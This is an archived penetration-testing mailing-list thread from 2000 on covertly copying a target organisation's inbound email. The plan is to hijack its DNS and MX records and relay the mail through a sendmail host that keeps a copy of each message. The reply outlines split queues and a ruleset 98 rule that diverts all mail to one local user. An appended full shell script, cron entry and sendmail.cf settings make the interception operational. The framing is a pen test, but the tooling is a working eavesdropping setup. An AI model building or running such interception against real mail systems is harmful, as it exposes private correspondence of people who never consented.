Penetration Testing mailing list archives

Re: [PEN-TEST] Sendmail: Keeping a copy of relayed email
From: Andrew Brown <atatat () ATATDOT NET>
Date: Fri, 1 Sep 2000 14:28:04 -0400

> I am currently looking into the possibility of eavesdropping a client's
> inbound email as part of a penetration test.  I have about 75% of the
> problem worked out, but I would really like some help with the last 25%.
>
> I have figured a way that I can take over DNS authority for their domain
> name, and then set up my own DNS server to serve their records.  Once this
> is in place I will set up one of my machines as their primary MX.  On this
> machine I will use sendmail's mailertable feature to get their incoming
> email to their email server.
>
> My problem is - I want to keep a copy of the incoming email that I relay
> off my machine.
>
> An associate has suggested that I would need to hand-hack the sendmail.cf
> file to add another (local) recipient into the mail delivery before it is
> sent off to mailertable for delivery.  My sendmail skills aren't quite up
> to this level, and I wondered if anybody has ideas on how I can turn this
> into a reality?  Anybody done something like this before?  Anybody seen a
> how-to on this?  Anybody provide some pointers to a quick heads-up on
> sendmail.cf delivery rule hacking?

off the top of my head, i'd guess that using separate inbound (one)
and outbound queues (two) would do the trick.  then run three daemons
and a cron job as follows:

(1) listens on port 25 for inbound mail, drops it in (for lack of a
better name) /var/spool/mqueue-i.  sendmail.cf changes: delivery mode
set to queue only.

(2) the cron job periodically (every five to fifteen minutes) copies
all the queue files to /var/spool/mqueue-o1 and /var/spool/mqueue-o2.

(3) the second sendmail daemon runs queue-o1 and has the relay (either
DR, DS, or DH, i'm not sure which, nor how much it matters) set to the
mx host of the actual company.  2nd sendmail.cf changes: set one of
the aforementioned variables.

(4) the third sendmail daemon runs queue-o2 and just delivers
*everything* locally to one user.  3rd sendmail.cf changes: one line
added to rule set 98 as follows:

     R $*<@$*>$*                     $#local $: bnite

the queue runners could easily be started from the cron job,
presumably based on the presence of actual files in their respective

alternately you could just save up the queue files in queue-o2 so that
the envelope information is intact.

|-----< "CODE WARRIOR" >-----|
codewarrior () daemon org             * "ah!  i see you have the internet
twofsonet () graffiti com (Andrew Brown)                that goes *ping*!"
andrew () crossbar com       * "information is power -- share the wealth."
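The cron-job half of the scheme above (step 2, plus kicking off the two queue runners from steps 3 and 4) is the part most likely to go wrong in practice, because a queue runner that wakes up while a qf file is half-copied, or that finds a qf without its df, will log an error and can leave the message stranded. The script below is an added example written for this page, not code from Andrew Brown's reply. It assumes the queue directory names from the reply, that the per-daemon configs live at /etc/mail/sendmail-relay.cf and /etc/mail/sendmail-local.cf (assumed paths), that `DS` is the macro used for the relay daemon (the reply leaves the choice open), and that the local-copy mailbox user is the `bnite` from the ruleset 98 rule. It copies the df (data) file before the qf (control) file and lands the qf under a tf name that sendmail's queue runner ignores, renaming it into place atomically, so a runner never sees a partial or orphaned control file; it also refuses to clobber an id still present in an outbound queue and leaves behind any message the inbound daemon has not finished writing.

```shell
#!/bin/sh
# Fan out sendmail queue files from the inbound (queue-only) daemon's
# spool into two outbound spools: one relayed to the real MX, one
# delivered locally to a single mailbox.  Added example, not from the
# original post; paths, config names and the DS choice are assumptions.
#
# Per-daemon sendmail.cf settings this script assumes (the R line needs a
# literal TAB between its left- and right-hand sides):
#   inbound : O DeliveryMode=q
#             O QueueDirectory=/var/spool/mqueue-i
#   relay   : O QueueDirectory=/var/spool/mqueue-o1
#             DSmx.target.example          (smart host = the real MX; assumed)
#   local   : O QueueDirectory=/var/spool/mqueue-o2
#             in ruleset 98:  R$*<@$*>$*<TAB>$#local $: bnite
set -u

CF_RELAY=${CF_RELAY:-/etc/mail/sendmail-relay.cf}   # assumed path
CF_LOCAL=${CF_LOCAL:-/etc/mail/sendmail-local.cf}   # assumed path

# Number of complete control files (qf*) sitting in queue directory $1.
count_messages() {
    count=0
    for qf in "$1"/qf*; do
        if [ -e "$qf" ]; then count=$((count + 1)); fi
    done
    echo "$count"
}

# Copy one message (qf=$1, df=$2, id=$4) into queue directory $3.
# Data file first, then the control file under a tf name the queue
# runner ignores, then an atomic rename: a runner that wakes mid-copy
# never sees a qf without its df or a half-written qf.
place_copy() {
    cp -p "$2" "$3/df$4" && cp -p "$1" "$3/tf$4" && mv "$3/tf$4" "$3/qf$4"
}

# Move every complete qf/df pair from $1 into both $2 and $3.
# Prints the number of messages fanned out.
fanout_queue() {
    in=$1; out1=$2; out2=$3
    moved=0
    for qf in "$in"/qf*; do
        [ -e "$qf" ] || continue                 # glob matched nothing
        id=${qf##*/qf}
        df="$in/df$id"
        # The inbound daemon writes df, then tf, then renames tf to qf;
        # a qf without a df is therefore not ours to touch yet.
        [ -f "$df" ] || continue
        if [ -e "$out1/qf$id" ] || [ -e "$out2/qf$id" ]; then
            echo "skip $id: still present in an outbound queue" >&2
            continue
        fi
        place_copy "$qf" "$df" "$out1" "$id" || return 1
        place_copy "$qf" "$df" "$out2" "$id" || return 1
        rm -f "$qf" "$df"
        moved=$((moved + 1))
    done
    echo "$moved"
}

# Wake a queue runner only when its spool has work.  -C selects that
# daemon's sendmail.cf, -oQ its queue directory, -q runs the queue once.
run_queue_runners() {
    if [ "$(count_messages "$1")" -gt 0 ]; then
        sendmail -C"$CF_RELAY" -oQ"$1" -q
    fi
    if [ "$(count_messages "$2")" -gt 0 ]; then
        sendmail -C"$CF_LOCAL" -oQ"$2" -q
    fi
}

# Cron entry (assumed):  */5 * * * * /usr/local/sbin/fanout-queue.sh \
#     /var/spool/mqueue-i /var/spool/mqueue-o1 /var/spool/mqueue-o2
if [ "$#" -eq 3 ]; then
    moved=$(fanout_queue "$1" "$2" "$3")
    echo "fanned out $moved message(s)"
    run_queue_runners "$2" "$3"
fi
```

Because the relay queue and the local-copy queue each hold their own qf file, the envelope (sender, recipients, received headers) survives intact in the kept copy, which is the point of Andrew's "alternately" remark; keeping the copies in queue-o2 unprocessed until the engagement ends is just a matter of never running the second queue runner.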
